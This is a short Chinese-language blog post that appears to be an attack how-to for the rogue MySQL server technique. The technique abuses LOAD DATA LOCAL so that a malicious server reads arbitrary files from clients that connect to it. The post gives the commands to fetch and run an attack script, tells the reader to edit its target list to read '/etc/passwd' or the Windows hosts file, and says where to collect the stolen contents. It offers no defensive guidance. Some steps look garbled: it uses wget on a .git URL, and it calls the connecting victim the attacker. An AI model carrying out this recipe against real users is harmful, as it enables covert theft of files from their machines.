Mysql读取客户端任意文件
漏洞成因
Mysql客户端可以利用load data local 命令读取任意文件。
服务器
攻击脚本地址:
https://github.com/allyshka/Rogue-MySql-Server
服务器执行:
wget https://github.com/allyshka/Rogue-MySql-Server.git
cd Rogue-MySql-Server
#如果针对客户端为windows,将rogue_mysql_server.py的26-28行换成以下内容
filelist = (
#'/etc/passwd',
r'c:\windows\system32\drivers\etc\hosts',
)
python rogue_mysql_server.py
攻击者
利用Navicat进行连接Mysql服务。
查看结果
登入服务器,查看mysql.log即可读取文件内容。
本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!